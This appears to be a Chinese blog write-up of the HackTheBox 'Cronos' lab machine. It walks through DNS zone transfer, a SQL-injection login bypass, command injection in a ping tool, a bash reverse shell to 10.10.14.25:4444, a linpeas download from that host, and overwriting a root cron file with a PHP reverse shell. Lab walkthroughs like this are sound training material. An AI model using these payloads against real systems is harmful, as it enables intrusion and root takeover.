HackTheBox-Machines--Cronos

文章目录

  • [0x01 信息收集](#0x01 信息收集)
  • [0x02 命令注入漏洞](#0x02 命令注入漏洞)
  • [0x03 权限提升](#0x03 权限提升)

Cronos 测试过程


0x01 信息收集


1.端口扫描

发现 SSH(22)、DNS(53)、HTTP(80)端口

sql 复制代码
nmap -sC -sV 10.129.227.211

2.53端口开启,进行DNS枚举

发现子域名:ns1.cronos.htb,确定域名为cronos.htb

2.1 DNS区域传输

返回主域、子域:cronos.htb、admin.cronos.htb、ns1.cronos.htb、www.cronos.htb

3.访问发现的主域、子域

3.1 IP访问、ns1.cronos.htb

3.2 cronos.htb 和 www.cronos.htb

两个链接都指向外部网站 Laravel,搜索相关Laravel漏洞,但是不知道具体版本。

3.3 admin.cronos.htb

admin.cronos.htb指向登录请求,尝试进行SQL注入漏洞

sql 复制代码
# 用户名输入paylaod
' or 1=1-- -

0x02 命令注入漏洞

在抓取执行命令的请求包后,发现Net Tool工具执行的命令检索为:ping -c 1 127.0.0.1,command 和 host 拼接进行执行。

1.尝试更改command命令进行命令注入

bash 复制代码
# 更改command命令为id,host留空,执行命令为:id,成功响应
id

2.执行命令获取反弹shell

bash 复制代码
# payload
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.25/4444+0>%261'

执行成功,获取到shell


0x03 权限提升

1.检查可获取root权限文件

bash 复制代码
# 上传linpeas.sh
wget http://10.10.14.25:8000/linpeas.sh
chmod +x linpeas.sh
bash linpeas.sh

发现 /var/www/laravel/ artisan 文件是一个计划任务文件,并且将以 root 权限每分钟运行一次。

如果可以 www-data 用户对该文件具有写入权限,那么可以通过在文件中写入反弹shell命令获取到root权限。

2.检查 artisan 文件权限

www-data 对 artisan 文件具有写入权限

3.在artisan 文件写入反弹shell命令

bash 复制代码
echo  '<?php exec("/bin/bash -c ' "'" 'bash -i >& /dev/tcp/10.10.14.25/4444 0>&1' "'" '");' > artisan

artisan文件每分钟会执行一次,等到文件执行,获取到root权限

相关推荐
摸鱼也很难18 天前
小迪安全笔记 第四十四天 sql盲注 && 实战利用sql盲注 进行漏洞的利用
笔记·sql·安全·sql注入·盲注
摸鱼也很难23 天前
小迪安全第四十二天笔记 简单的mysql注入 && mysql的基础知识 用户管理数据库模式 && mysql 写入与读取 && 跨库查询
笔记·安全·web安全·sql注入·pikachu
风飘红技术中心2 个月前
2024-网鼎杯第二次模拟练习-web02
sql·web·ctf·sql注入·网鼎杯
ccc_9wy2 个月前
sql-labs靶场第十六关测试报告
数据库·sql·web安全·网络安全·sql注入·sqlmap·盲注
ccc_9wy2 个月前
sql-labs靶场第十五关测试报告
数据库·sql·web安全·网络安全·sql注入·sqlmap·布尔盲注
ccc_9wy2 个月前
sql-labs靶场第十四关测试报告
数据库·sql·web安全·网络安全·sql注入·sqlmap·报错注入
穿鞋子泡脚2 个月前
关于sql注入预编译的思考
数据库·sql·web安全·漏洞挖掘·sql注入
一路向北_.2 个月前
CTFshow 命令执行 web37-web40
网络安全·web·命令执行
癞皮狗不赖皮3 个月前
WEB攻防- Oracle基本注入
数据库·oracle·sql注入
小小工匠3 个月前
加密与安全_三种常见的注入攻击
安全·sql注入·xss攻击·代码注入